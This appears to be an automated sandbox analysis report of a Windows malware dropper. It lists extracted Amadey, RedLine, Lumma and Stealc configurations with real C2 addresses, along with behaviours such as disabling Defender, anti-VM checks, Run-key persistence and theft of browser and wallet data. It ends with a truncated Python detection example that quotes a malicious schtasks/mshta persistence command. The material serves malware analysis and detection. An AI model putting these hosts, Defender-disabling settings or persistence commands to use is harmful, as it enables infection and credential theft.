Analysis
max time kernel: 112s
max time network: 151s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted: 09/03/2025, 02:37
Static task: static1
Behavioral task: behavioral1
  Sample: dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
  Resource: win10v2004-20250217-en
General
Target: dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
Size: 938KB
MD5: 177de0a157b6aa0663ffae3821f3b026
SHA1: 82b14ddc83e589e0efad23054271d7c9307e5adc
SHA256: dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017
SHA512: 02507fb2431dfc88bbab9d1cf4b227aca16da3629667a1ae6268de06aa1a1dfb037aa8e9b8d7177f7976e2c7c7bb683406591664b1bd9e37cdec7df993ff6ac5
SSDEEP: 24576:pqDEvCTbMWu7rQYlBQcBiT6rprG8a0cu:pTvC/MTQYxsWR7a0c
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
Extracted
redline
Build 7
101.99.92.190:40919
Extracted
lumma
Extracted
stealc
trump
http://45.93.20.28
url_path: /85a1cacf11314eb8.php
Signatures

Amadey family

Detects Healer, an antivirus disabler dropper (3 IoCs)
resource  yara_rule
behavioral1/memory/3372-1713-0x0000000000E80000-0x00000000012F2000-memory.dmp  healer
behavioral1/memory/3372-1712-0x0000000000E80000-0x00000000012F2000-memory.dmp  healer
behavioral1/memory/3372-1733-0x0000000000E80000-0x00000000012F2000-memory.dmp  healer

Healer family

Lumma family

Modifies Windows Defender DisableAntiSpyware setting (1 IoC)
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"  30c6dab708.exe

Modifies Windows Defender Real-time Protection settings (3 TTPs, 6 IoCs)
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  30c6dab708.exe

Modifies Windows Defender TamperProtection setting (1 IoC)
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  30c6dab708.exe

Modifies Windows Defender notification settings (3 TTPs, 2 IoCs)
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"  30c6dab708.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (7 IoCs)
resource  yara_rule
behavioral1/memory/2648-55-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral1/memory/2648-60-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral1/memory/2648-57-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral1/memory/2648-62-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral1/memory/2648-63-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral1/memory/3864-2661-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline
behavioral1/memory/3864-2659-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline

Redline family

SectopRAT payload (7 IoCs)
resource  yara_rule
behavioral1/memory/2648-55-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat
behavioral1/memory/2648-60-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat
behavioral1/memory/2648-57-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat
behavioral1/memory/2648-62-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat
behavioral1/memory/2648-63-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat
behavioral1/memory/3864-2661-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat
behavioral1/memory/3864-2659-0x0000000000400000-0x000000000041E000-memory.dmp  family_sectoprat

Sectoprat family

Stealc family

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
description  pid  Process  procid_target
PID 3016 created 1208  3016  Occupation.com  21
PID 3016 created 1208  3016  Occupation.com  21
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 7 IoCs)
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  rapes.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  483d2fa8a0d53818306efeb32d3.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  e267fb67b5.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  a221fd437d.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  30c6dab708.exe

Blocklisted process makes network request (11 IoCs)
flow  pid  Process
4  1856  powershell.exe
14  280  powershell.exe
30  280  powershell.exe
31  280  powershell.exe
36  280  powershell.exe
44  1988  powershell.exe
53  280  powershell.exe
184  4020  powershell.exe
185  4020  powershell.exe
186  4020  powershell.exe
187  4020  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 10 IoCs)
Runs PowerShell with a hidden display window.
pid  Process
2068  powershell.exe
280  powershell.exe
1988  powershell.exe
280  powershell.exe
3868  powershell.exe
4020  powershell.exe
1856  powershell.exe
2576  powershell.exe
2664  powershell.exe
3060  powershell.exe

Downloads MZ/PE file (13 IoCs)
flow  pid  Process
147  2800  rapes.exe
7  2800  rapes.exe
7  2800  rapes.exe
7  2800  rapes.exe
7  2800  rapes.exe
49  2800  rapes.exe
49  2800  rapes.exe
49  2800  rapes.exe
4  1856  powershell.exe
15  2800  rapes.exe
24  2404  XxzH301.exe
44  1988  powershell.exe
53  280  powershell.exe

Checks BIOS information in registry (2 TTPs, 14 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  e267fb67b5.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  a221fd437d.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  30c6dab708.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  483d2fa8a0d53818306efeb32d3.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  e267fb67b5.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  a221fd437d.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  30c6dab708.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  rapes.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  rapes.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  483d2fa8a0d53818306efeb32d3.exe

Drops startup file (2 IoCs)
description  ioc  Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url  cmd.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url  cmd.exe

Executes dropped EXE (21 IoCs)
pid  Process
2716  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
2800  rapes.exe
2840  PfOHmro.exe
2648  PfOHmro.exe
1316  ReK7Ewx.exe
3016  Occupation.com
2404  XxzH301.exe
2936  m4mrV1B.exe
2296  OSKDbmy.exe
1208  Explorer.EXE
1748  3b9ee8ffbb.exe
780  TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE
2948  mic800F.tmp.exe
2588  e267fb67b5.exe
2676  a221fd437d.exe
1360  156f54f6b5.exe
3372  30c6dab708.exe
3796  HHPgDSI.exe
3356  HHPgDSI.exe
872  m4mrV1B.exe
1800  ReK7Ewx.exe
Identifies Wine through registry keys (2 TTPs, 7 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  e267fb67b5.exe
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  a221fd437d.exe
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  30c6dab708.exe
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  rapes.exe
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE
Key opened  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine  483d2fa8a0d53818306efeb32d3.exe

Loads dropped DLL (36 IoCs)
pid  Process
1856  powershell.exe
1856  powershell.exe
2716  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
2716  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
2800  rapes.exe
2840  PfOHmro.exe
3044  WerFault.exe
3044  WerFault.exe
3044  WerFault.exe
3044  WerFault.exe
3044  WerFault.exe
2800  rapes.exe
1736  cmd.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
3016  Occupation.com
2800  rapes.exe
1988  powershell.exe
1988  powershell.exe
2800  rapes.exe
2800  rapes.exe
2772  WerFault.exe
2772  WerFault.exe
2772  WerFault.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe
2800  rapes.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Windows security modification (2 TTPs, 2 IoCs)
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features  30c6dab708.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  30c6dab708.exe

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 8 IoCs)
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147610121\\am_no.cmd"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\e267fb67b5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148390101\\e267fb67b5.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\a221fd437d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148400101\\a221fd437d.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\156f54f6b5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148410101\\156f54f6b5.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\30c6dab708.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148420101\\30c6dab708.exe"  rapes.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  m4mrV1B.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  m4mrV1B.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\3b9ee8ffbb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147600101\\3b9ee8ffbb.exe"  rapes.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Indicator Removal: File Deletion (1 TTPs)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 7 IoCs)
flow  ioc
184  bitbucket.org
185  bitbucket.org
17  bitbucket.org
18  bitbucket.org
31  bitbucket.org
36  bitbucket.org
183  bitbucket.org
AutoIT Executable (2 IoCs)
AutoIT scripts compiled to PE executables.
resource  yara_rule
behavioral1/files/0x000b00000001a4f9-1011.dat  autoit_exe
behavioral1/files/0x0004000000005b57-1551.dat  autoit_exe

Enumerates processes with tasklist (1 TTPs, 6 IoCs)
pid  Process
1772  tasklist.exe
1984  tasklist.exe
3336  tasklist.exe
1944  tasklist.exe
4072  tasklist.exe
2688  tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (7 IoCs)
pid  Process
2716  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
2800  rapes.exe
780  TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE
2320  483d2fa8a0d53818306efeb32d3.exe
2588  e267fb67b5.exe
2676  a221fd437d.exe
3372  30c6dab708.exe

Suspicious use of SetThreadContext (1 IoCs)
description  pid  Process  procid_target
PID 2840 set thread context of 2648  2840  PfOHmro.exe  41

Drops file in Windows directory (8 IoCs)
description  ioc  Process
File opened for modification  C:\Windows\CombatTongue  ReK7Ewx.exe
File opened for modification  C:\Windows\PracticeRoot  ReK7Ewx.exe
File opened for modification  C:\Windows\PlatesRegister  ReK7Ewx.exe
File created  C:\Windows\Tasks\rapes.job  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
File opened for modification  C:\Windows\CombatTongue  ReK7Ewx.exe
File opened for modification  C:\Windows\PracticeRoot  ReK7Ewx.exe
File opened for modification  C:\Windows\PlatesRegister  ReK7Ewx.exe
File created  C:\Windows\main.exe  PfOHmro.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (5 IoCs)
pid  pid_target  Process  procid_target
3044  2840  WerFault.exe  40
2772  2588  WerFault.exe  101
3764  3460  WerFault.exe  150
2524  2880  WerFault.exe  172
3964  3812  WerFault.exe  174
System Location Discovery: System Language Discovery (1 TTPs, 58 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  expand.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  findstr.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  extrac32.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  IEXPLORE.EXE
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage  156f54f6b5.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  30c6dab708.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language  156f54f6b5.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  tasklist.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  timeout.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  e267fb67b5.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  156f54f6b5.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  rapes.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  findstr.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  tasklist.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Occupation.com
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  findstr.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ReK7Ewx.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  3b9ee8ffbb.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mic800F.tmp.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  expand.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ReK7Ewx.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  choice.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  a221fd437d.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PfOHmro.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PfOHmro.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
System Time Discovery (1 TTPs, 1 IoCs)
Adversaries may gather the system time and/or time zone settings from a local or remote system.
pid  Process
1960  iexplore.exe

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  firefox.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  firefox.exe

Delays execution with timeout.exe (1 IoCs)
pid  Process
2416  timeout.exe

Kills process with taskkill (5 IoCs)
pid  Process
2496  taskkill.exe
2208  taskkill.exe
2648  taskkill.exe
2440  taskkill.exe
2456  taskkill.exe
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc428415
5fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a XxzH301.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 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 XxzH301.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2108 schtasks.exe 2872 schtasks.exe 2496 schtasks.exe 2232 schtasks.exe 3624 schtasks.exe -
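An added triage example, not code from the report. Every schtasks call in this tree registers a task that re-runs mshta on an .hta dropped in a user-writable directory every 25 minutes, which is the profile worth alerting on rather than schtasks.exe itself. The block parses the three command lines from the process tree below and scores them; because a task registered through the Task Scheduler COM API (the "Uses Task Scheduler COM API" signature) never produces a schtasks command line, the same scoring also runs over a task XML definition of the kind the service stores under C:\Windows\System32\Tasks. The benign backup task and the XML document are constructed for the example; the scoring thresholds (60 minutes, the script-host list) are the author's choices, not something the report states.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the three schtasks command lines from this report's process
# tree plus one ordinary backup task, to show the rule staying quiet on benign use.
SAMPLE_CMDLINES = [
    r'schtasks /create /tn A7XKlmaRIxe /tr "mshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta" /sc minute /mo 25 /ru "Admin" /f',
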